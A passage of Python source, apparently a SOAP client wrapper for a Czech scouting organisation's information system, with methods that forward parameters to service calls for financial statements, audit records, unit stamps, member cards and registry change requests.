    return self._client.service.SexAll(payload)
# Načíst seznam hospodářských výkazů
def StatementAll(self, ID_Login, ID_Unit, Year, ID_StatementType=None):
    """Load the list of financial statements (SOAP call ``StatementAll``)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Unit": ID_Unit,
        "Year": Year,
        "ID_StatementType": ID_StatementType,
    }
    return self._client.service.StatementAll(payload)
# Smazat hospodářský výkaz
def StatementDelete(self, ID_Login, ID):
    """Delete a financial statement (SOAP call ``StatementDelete``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.StatementDelete(payload)
# Načíst detail hospodářského výkazu
def StatementDetail(self, ID_Login, ID):
    """Load the detail of a financial statement (SOAP call ``StatementDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.StatementDetail(payload)
# Načíst seznam položek hospodářského výkazu
def StatementEntryAll(self, ID_Login, ID_Statement, ID_StatementEntryType, IsMoney):
    """Load the entries of a financial statement (SOAP call ``StatementEntryAll``)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Statement": ID_Statement,
        "ID_StatementEntryType": ID_StatementEntryType,
        "IsMoney": IsMoney,
    }
    return self._client.service.StatementEntryAll(payload)
# Načíst seznam závěrkových položky
def StatementEntryTypeAll(self, ID_Login, DisplayName=None, ID_StatementType=None):
    """Load the list of statement entry types (SOAP call ``StatementEntryTypeAll``)."""
    payload = {"ID_Login": ID_Login, "DisplayName": DisplayName, "ID_StatementType": ID_StatementType}
    return self._client.service.StatementEntryTypeAll(payload)
# Upravit položku hospodářského výkazu
def StatementEntryUpdate(self, ID_Login, ID, ID_Statement, ID_StatementEntryType, Amount, AmountLastYear, AmountMain, AmountEconomic):
    """Update an entry of a financial statement (SOAP call ``StatementEntryUpdate``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.StatementEntryUpdate(payload)
# Založit hospodářský výkaz
def StatementInsert(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
    """Create a financial statement (SOAP call ``StatementInsert``).

    Forwards every argument under its own name; the request dict mirrors
    the method signature 1:1.
    """
    payload = dict(locals())
    del payload["self"]  # all remaining locals are exactly the SOAP request fields
    return self._client.service.StatementInsert(payload)
# Načíst seznam typů hospodářského výkazu
def StatementTypeAll(self, ID_Login, DisplayName=None):
    """Load the list of statement types (SOAP call ``StatementTypeAll``)."""
    payload = {"ID_Login": ID_Login, "DisplayName": DisplayName}
    return self._client.service.StatementTypeAll(payload)
# Načíst seznam evidencí provedených kontrol
def UnitAuditRegisterAll(self, ID_Login, ID, ID_Unit):
    """Load the list of audit-register records (SOAP call ``UnitAuditRegisterAll``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit}
    return self._client.service.UnitAuditRegisterAll(payload)
# Načíst detail evidence provedené kontroly
def UnitAuditRegisterDetail(self, ID_Login, ID):
    """Load the detail of an audit-register record (SOAP call ``UnitAuditRegisterDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.UnitAuditRegisterDetail(payload)
# Založit evidenci provedené kontroly
def UnitAuditRegisterInsert(self, ID_Login, ID, ID_Unit, Year, ID_DocumentReport, ID_PersonReport, ReportDone, ID_DocumentAudit, ID_PersonAudit, AuditDone, ID_TempFileReport, ID_TempFileAudit, Unit=None, RegistrationNumber=None, PersonReport=None, ReportText=None, PersonAudit=None, AuditText=None):
    """Create an audit-register record (SOAP call ``UnitAuditRegisterInsert``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.UnitAuditRegisterInsert(payload)
# Zadat soubory
def UnitAuditRegisterUpdate(self, ID_Login, ID, ID_Unit, Year, ID_DocumentReport, ID_PersonReport, ReportDone, ID_DocumentAudit, ID_PersonAudit, AuditDone, ID_TempFileReport, ID_TempFileAudit, Unit=None, RegistrationNumber=None, PersonReport=None, ReportText=None, PersonAudit=None, AuditText=None):
    """Update an audit-register record / attach its files (SOAP call ``UnitAuditRegisterUpdate``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.UnitAuditRegisterUpdate(payload)
# Načtení informací o slevovém kódu jednotky
def UnitDetailShopDiscount(self, ID_Login, ID, ID_Person):
    """Load a unit's shop discount code information (SOAP call ``UnitDetailShopDiscount``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person}
    return self._client.service.UnitDetailShopDiscount(payload)
# Načíst seznam důvodů založení jednotky
def UnitFoundReasonAll(self, ID_Login, ID=None, DisplayName=None):
    """Load the list of unit founding reasons (SOAP call ``UnitFoundReasonAll``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName}
    return self._client.service.UnitFoundReasonAll(payload)
# Načíst seznam adres
def UnitJournalDeliveryAll(self, ID_Login, ID, ID_Unit):
    """Load the list of journal delivery addresses (SOAP call ``UnitJournalDeliveryAll``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit}
    return self._client.service.UnitJournalDeliveryAll(payload)
# Načíst detail adresy
def UnitJournalDeliveryDetail(self, ID_Login, ID, ID_Unit, ID_Person, Unit=None, RegistrationNumber=None, Street=None, Ciry=None, PostCode=None, FirstLine=None, State=None, ID_JournalDeliveryType=None):
    """Load the detail of a journal delivery address (SOAP call ``UnitJournalDeliveryDetail``).

    NOTE(review): the ``Ciry`` spelling presumably mirrors a typo in the
    service schema — do not rename without checking the WSDL.
    """
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.UnitJournalDeliveryDetail(payload)
# Založit adresu
def UnitJournalDeliveryInsert(self, ID_Login, ID, ID_Unit, ID_Person, Unit=None, RegistrationNumber=None, Street=None, Ciry=None, PostCode=None, FirstLine=None, State=None, ID_JournalDeliveryType=None):
    """Create a journal delivery address (SOAP call ``UnitJournalDeliveryInsert``).

    NOTE(review): the ``Ciry`` spelling presumably mirrors a typo in the
    service schema — do not rename without checking the WSDL.
    """
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.UnitJournalDeliveryInsert(payload)
# Upravit adresu
def UnitJournalDeliveryUpdate(self, ID_Login, ID, ID_Unit, ID_Person, Unit=None, RegistrationNumber=None, Street=None, Ciry=None, PostCode=None, FirstLine=None, State=None, ID_JournalDeliveryType=None):
    """Update a journal delivery address (SOAP call ``UnitJournalDeliveryUpdate``).

    NOTE(review): the ``Ciry`` spelling presumably mirrors a typo in the
    service schema — do not rename without checking the WSDL.
    """
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.UnitJournalDeliveryUpdate(payload)
# Načíst seznam razítek jednotky
def UnitStampAll(self, ID_Login, ID_Unit, ID, ID_StampType=None):
    """Load the list of unit stamps (SOAP call ``UnitStampAll``)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Unit": ID_Unit,
        "ID": ID,
        "ID_StampType": ID_StampType,
    }
    return self._client.service.UnitStampAll(payload)
# Smazat razítko jednotky
def UnitStampDelete(self, ID_Login, ID):
    """Delete a unit stamp (SOAP call ``UnitStampDelete``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.UnitStampDelete(payload)
# Načíst detail razítka jednotky
def UnitStampDetail(self, ID_Login, ID):
    """Load the detail of a unit stamp (SOAP call ``UnitStampDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.UnitStampDetail(payload)
# Založit razítko jednotky
def UnitStampInsert(self, ID_Login, ID, ID_Unit, Count, Unit=None, RegistrationNumber=None, ID_StampType=None, StampType=None, Email=None, Web=None):
    """Create a unit stamp (SOAP call ``UnitStampInsert``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.UnitStampInsert(payload)
# Upravit razítko jednotky
def UnitStampUpdate(self, ID_Login, ID, ID_Unit, Count, Unit=None, RegistrationNumber=None, ID_StampType=None, StampType=None, Email=None, Web=None):
    """Update a unit stamp (SOAP call ``UnitStampUpdate``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.UnitStampUpdate(payload)
# Nastavit typ rozesílky balíčků pro nováčky
def UnitUpdateJournalDeliveryType(self, ID_Login, ID, ID_JournalDeliveryType=None):
    """Set the delivery type for newcomer packages (SOAP call ``UnitUpdateJournalDeliveryType``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "ID_JournalDeliveryType": ID_JournalDeliveryType}
    return self._client.service.UnitUpdateJournalDeliveryType(payload)
# Nastavit způsob odběru balíčků pro nováčky
def UnitUpdateChangeJournalNovice(self, ID_Login, ID, ID_JournalNovice=None):
    """Set how newcomer packages are received (SOAP call ``UnitUpdateChangeJournalNovice``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "ID_JournalNovice": ID_JournalNovice}
    return self._client.service.UnitUpdateChangeJournalNovice(payload)
# Upravit jméno jednotky
def UnitUpdateName(self, ID_Login, ID, ID_Group, ID_Unit, ContainsMembers, CommissionDeadline, IsVatPayer, ID_TroopArt, CanUpdateRegistrationNumber, IsUnitCancel, JournalParent, ChangeFreeJournal, ID_UnitParent, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, ID_PersonChangeName, DateChangeName, IsPropertyOwner, ID_TempFilePropertyAgreement, ID_DocumentDecision, ID_DocumentPropertyAgreement, ID_TempFileSeatChange, ID_UnitType=None, UnitType=None, DisplayName=None, SortName=None, RegistrationNumber=None, ShortRegistrationNumber=None, Location=None, IC=None, DIC=None, FileReference=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, TroopArt=None, LogoContent=None, LogoExtension=None, AddressDistrict=None, PostalDistrict=None, NewDisplayName=None, CompleteDisplayName=None, PersonChangeName=None, PropertyAgreementExtension=None, PropertyAgreementContent=None, TroopArtKey=None, ID_JournalNovice=None, ID_JournalDeliveryType=None, FullDisplayName=None, DecisionSeatChangeExtension=None, ShopDiscountBarcode=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
    """Update a unit's name and related registry data (SOAP call ``UnitUpdateName``).

    Forwards every argument under its own name; the request dict mirrors
    the method signature 1:1.
    """
    payload = dict(locals())
    del payload["self"]  # all remaining locals are exactly the SOAP request fields
    return self._client.service.UnitUpdateName(payload)
# Ukončit platnost účtu
def AccountUpdateCancel(self, ID_Login, ID, ID_Unit, ValidTo, ID_Bank, IsMain, DisplayName=None, Unit=None, Bank=None, AccountPrefix=None, AccountNumber=None, Street=None, City=None, Postcode=None, Note=None):
    """End the validity of a bank account (SOAP call ``AccountUpdateCancel``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.AccountUpdateCancel(payload)
# Načíst seznam věkových kategorií
def AgeCategoryAll(self, ID_Login, IsMore):
    """Load the list of age categories (SOAP call ``AgeCategoryAll``)."""
    payload = {"ID_Login": ID_Login, "IsMore": IsMore}
    return self._client.service.AgeCategoryAll(payload)
# Načíst seznam ústředních orgánů
def AgencyAll(self, ID_Login, ID, DisplayName=None):
    """Load the list of central agencies (SOAP call ``AgencyAll``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName}
    return self._client.service.AgencyAll(payload)
# Načíst seznam členských karet
def MemberCardAll(self, ID_Login, ID_Person, ID, ID_PersonSchool, ID_MemberCardState=None, DisplayName=None, ID_MemberCardType=None):
    """Load the list of member cards (SOAP call ``MemberCardAll``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.MemberCardAll(payload)
# Smazat členskou kartu
def MemberCardDelete(self, ID_Login, ID):
    """Delete a member card (SOAP call ``MemberCardDelete``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.MemberCardDelete(payload)
# Načíst detail členské karty
def MemberCardDetail(self, ID_Login, ID, DisplayName=None):
    """Load the detail of a member card (SOAP call ``MemberCardDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName}
    return self._client.service.MemberCardDetail(payload)
# Založit členskou kartu
def MemberCardInsert(self, ID_Login, ID, ID_Person, Birthday, Year, DateCreate, Price, IsAuthorized, IsPaid, ValidFrom, ValidTo, ID_PersonSchool, ID_PersonRegistration, ID_DocumentMediumPhoto, ID_MemberCardState=None, MemberCardState=None, DisplayName=None, Person=None, ID_MemberCardType=None, MemberCardType=None, PersonSchool=None, PersonSchoolCity=None, UnitStredisko=None, LeaderContact=None, StorageMediumPhoto=None):
    """Create a member card (SOAP call ``MemberCardInsert``).

    Forwards every argument under its own name; the request dict mirrors
    the method signature 1:1.
    """
    payload = dict(locals())
    del payload["self"]  # all remaining locals are exactly the SOAP request fields
    return self._client.service.MemberCardInsert(payload)
# Upravit členskou kartu
def MemberCardUpdate(self, ID_Login, ID, ID_Person, Birthday, Year, DateCreate, Price, IsAuthorized, IsPaid, ValidFrom, ValidTo, ID_PersonSchool, ID_PersonRegistration, ID_DocumentMediumPhoto, ID_MemberCardState=None, MemberCardState=None, DisplayName=None, Person=None, ID_MemberCardType=None, MemberCardType=None, PersonSchool=None, PersonSchoolCity=None, UnitStredisko=None, LeaderContact=None, StorageMediumPhoto=None):
    """Update a member card (SOAP call ``MemberCardUpdate``).

    Forwards every argument under its own name; the request dict mirrors
    the method signature 1:1.
    """
    payload = dict(locals())
    del payload["self"]  # all remaining locals are exactly the SOAP request fields
    return self._client.service.MemberCardUpdate(payload)
# Objednat ztracenou kartu
def MemberCardUpdateRerequest(self, ID_Login, ID, ID_Person, Birthday, Year, DateCreate, Price, IsAuthorized, IsPaid, ValidFrom, ValidTo, ID_PersonSchool, ID_PersonRegistration, ID_DocumentMediumPhoto, ID_MemberCardState=None, MemberCardState=None, DisplayName=None, Person=None, ID_MemberCardType=None, MemberCardType=None, PersonSchool=None, PersonSchoolCity=None, UnitStredisko=None, LeaderContact=None, StorageMediumPhoto=None):
    """Order a replacement for a lost member card (SOAP call ``MemberCardUpdateRerequest``).

    Forwards every argument under its own name; the request dict mirrors
    the method signature 1:1.
    """
    payload = dict(locals())
    del payload["self"]  # all remaining locals are exactly the SOAP request fields
    return self._client.service.MemberCardUpdateRerequest(payload)
# Načíst kartu, na kterou má osoba právo
def PersonDetailMemberCard(self, ID_Login, ID):
    """Load the card a person is entitled to (SOAP call ``PersonDetailMemberCard``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.PersonDetailMemberCard(payload)
# Načíst aktuální potvrzení o studiu
def PersonDetailSchool(self, ID_Login, ID):
    """Load a person's current study confirmation (SOAP call ``PersonDetailSchool``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.PersonDetailSchool(payload)
# Smazat potvrzení o studiu
def PersonSchoolDelete(self, ID_Login, ID):
    """Delete a study confirmation (SOAP call ``PersonSchoolDelete``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.PersonSchoolDelete(payload)
# Založit potvrzení o studiu
def PersonSchoolInsert(self, ID_Login, ID, ID_Person, DateCreate, ID_TempFile, ID_PersonSchoolTempFile, ID_DocumentPhoto, ID_DocumentScan, Person=None, DisplayName=None, City=None, Extension=None, Scan=None, PhotoExtension=None, Photo=None):
    """Create a study confirmation (SOAP call ``PersonSchoolInsert``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.PersonSchoolInsert(payload)
# Načíst detail registrační vady osoby
def PersonMistakeReportDetail(self, ID_Login, ID):
    """Load the detail of a person's registration defect (SOAP call ``PersonMistakeReportDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.PersonMistakeReportDetail(payload)
# Upravit registrační vadu osoby
def PersonMistakeReportUpdate(self, ID_Login, ID, ID_Person, ID_Unit, ID_UnitRegistration, ID_Mistake, Person=None, UnitRegistrationNumber=None, Unit=None, Mistake=None, DisplayName=None, ParentComment=None):
    """Update a person's registration defect (SOAP call ``PersonMistakeReportUpdate``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.PersonMistakeReportUpdate(payload)
# Načíst celkový počet odvodů za doplňkové služby pro nadřízenou jednotku
def PersonRegistrationServiceAllSummary(self, ID_Login, ID_UnitRegistration):
    """Load total levies for supplementary services for the parent unit (SOAP call ``PersonRegistrationServiceAllSummary``)."""
    payload = {"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration}
    return self._client.service.PersonRegistrationServiceAllSummary(payload)
# Načíst detail registrační vady jednotky
def UnitMistakeReportDetail(self, ID_Login, ID):
    """Load the detail of a unit's registration defect (SOAP call ``UnitMistakeReportDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.UnitMistakeReportDetail(payload)
# Upravit registrační vadu jednotky
def UnitMistakeReportUpdate(self, ID_Login, ID, ID_Unit, ID_Mistake, Unit=None, RegistrationNumber=None, Mistake=None, DisplayName=None, ParentComment=None):
    """Update a unit's registration defect (SOAP call ``UnitMistakeReportUpdate``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.UnitMistakeReportUpdate(payload)
# Načíst věkovou kategorii oddílu
def UnitAgeCategoryDetail(self, ID_Login, ID_Unit):
    """Load a troop's age category (SOAP call ``UnitAgeCategoryDetail``)."""
    payload = {"ID_Login": ID_Login, "ID_Unit": ID_Unit}
    return self._client.service.UnitAgeCategoryDetail(payload)
# Nastaví věkovou kategorii oddílu
def UnitAgeCategoryUpdate(self, ID_Login, ID, ID_AgeCategory):
    """Set a troop's age category (SOAP call ``UnitAgeCategoryUpdate``)."""
    payload = {"ID_Login": ID_Login, "ID": ID, "ID_AgeCategory": ID_AgeCategory}
    return self._client.service.UnitAgeCategoryUpdate(payload)
# Načte seznam handicapů a počty lidí s handicapem pro oddíl
def UnitHandicapAllUnit(self, ID_Login, ID_Unit):
    """Load handicap types and counts of people with them for a troop (SOAP call ``UnitHandicapAllUnit``)."""
    payload = {"ID_Login": ID_Login, "ID_Unit": ID_Unit}
    return self._client.service.UnitHandicapAllUnit(payload)
# Načte datum poslení editace handicapů jednotky
def UnitHandicapLastUpdated(self, ID_Login, ID_Unit):
    """Load the date a unit's handicap data was last edited (SOAP call ``UnitHandicapLastUpdated``)."""
    payload = {"ID_Login": ID_Login, "ID_Unit": ID_Unit}
    return self._client.service.UnitHandicapLastUpdated(payload)
# Nastaví pro jednotku počet lidí s příslušným handicapem
def UnitHandicapUpdate(self, ID_Login, ID_Unit, ID_HandicapType, Value):
    """Set the number of people with a given handicap for a unit (SOAP call ``UnitHandicapUpdate``)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Unit": ID_Unit,
        "ID_HandicapType": ID_HandicapType,
        "Value": Value,
    }
    return self._client.service.UnitHandicapUpdate(payload)
# Nastavit zda se provede automatická změna časopisů zdarma
def UnitUpdateChangeFreeJournal(self, ID_Login, ID, ChangeFreeJournal, IncludeChild=None):
    """Set whether free journals are changed automatically (SOAP call ``UnitUpdateChangeFreeJournal``)."""
    payload = {
        "ID_Login": ID_Login,
        "ID": ID,
        "ChangeFreeJournal": ChangeFreeJournal,
        "IncludeChild": IncludeChild,
    }
    return self._client.service.UnitUpdateChangeFreeJournal(payload)
# Načíst seznam požadavků na změnu v registru OJ
def RegistryAll(self, ID_Login, ID_Unit, DateCreateFrom, DateCreateTo, DateCreateMonth, DateCreateYear, DisplayName=None, ID_RegistryObject=None, ID_RegistryType=None, ID_RegistryState=None):
    """Load the list of change requests in the unit registry (SOAP call ``RegistryAll``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.RegistryAll(payload)
# Načíst seznam požadavků pro odeslání zpráv
def RegistryAllMessage(self, ID_Login):
    """Load the list of requests queued for message dispatch (SOAP call ``RegistryAllMessage``)."""
    payload = {"ID_Login": ID_Login}
    return self._client.service.RegistryAllMessage(payload)
# Načíst seznam požadavků na změnu pro MV ČR
def RegistryAllMinistry(self, ID_Login):
    """Load the list of change requests for the Ministry of the Interior (SOAP call ``RegistryAllMinistry``)."""
    payload = {"ID_Login": ID_Login}
    return self._client.service.RegistryAllMinistry(payload)
# Načíst detail požadavku na změnu v registru OJ
def RegistryDetail(self, ID_Login, ID):
    """Load the detail of a registry change request (SOAP call ``RegistryDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.RegistryDetail(payload)
    # Send a message about a change of the group's statutory representative to the parent unit.
    def RegistrySendFunctionParentMessage(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
        return self._client.service.RegistrySendFunctionParentMessage({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": 
DecisionSeatChangeExtension})
    # Load the list of organizational-unit registry request states.
    def RegistryStateAll(self, ID_Login, DisplayName=None):
        return self._client.service.RegistryStateAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
    # Load the list of organizational-unit registry request types.
    def RegistryTypeAll(self, ID_Login, DisplayName=None, ID_RegistryObject=None):
        return self._client.service.RegistryTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName, "ID_RegistryObject": ID_RegistryObject})
    # Cancel a change request in the organizational-unit registry.
    def RegistryUpdateCancel(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
        return self._client.service.RegistryUpdateCancel({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
    # Close a change request in the organizational-unit registry.
    def RegistryUpdateClose(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
